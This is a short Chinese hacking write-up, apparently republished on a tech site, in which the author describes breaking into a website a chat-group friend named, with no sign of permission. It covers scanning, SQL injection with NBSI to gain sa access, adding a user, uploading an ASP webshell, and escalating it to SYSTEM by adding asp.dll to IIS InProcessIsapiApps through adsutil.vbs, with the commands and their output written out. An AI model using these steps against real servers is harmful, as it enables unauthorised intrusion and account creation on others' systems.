前几天群里的兄弟给了一个网站，问我可不可以入侵。

　　一、踩点

　　ping www.111.com 发现超时，可以是有防火墙或做了策略。再用superscan扫一下，发现开放的端口有很多个，初步估计是软件防火墙。

　　二、注入

　　从源文件里搜索关键字asp，找到了一个注入点。用nbsi注入，发现是sa口令登陆，去加了一个用户，显示命令完成。哈哈，看来管理员太粗心了。先上传一个webshell，上传了一个老兵的asp木马。接下来的就是个人习惯了，我平时入侵的习惯是先上传webshell，然后再把webshell提升为system权限。因为这样说可以说在入侵之时会非常的方便，我个人觉得这个方法非常好。

　　三、提升权限

　　先看哪些特权的：

　　cs cript C:\Inetpub\AdminS cripts\adsutil.vbs get /W3SVC/InProcessIsapiApps

　　得到：

　　Microsoft (R) Windows 脚本宿主版本 5.1 for Windows

　　版权所有(C) Microsoft Corporation 1996-1999. All rights reserved.

　　InProcessIsapiApps : (LIST) (5 Items)

　　"C:\WINNT\system32\idq.dll"

　　"C:\WINNT\system32\inetsrv\httpext.dll"

　　"C:\WINNT\system32\inetsrv\httpodbc.dll"

　　"C:\WINNT\system32\inetsrv\ssinc.dll"

　　"C:\WINNT\system32\msw3prt.dll"

　　把asp.dll加进去：

　　cs cript C:\Inetpub\AdminS cripts\adsutil.vbs

　　set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32

　　\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32

　　\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32

　　\inetsrv\asp.dll"

　　然后用asp木马加个用户，显示命令完成。

热门推荐：

通过DW设计网页时组织CSS的建议

交换机上配置虚拟局域网的技巧

【责任编辑 彭凡】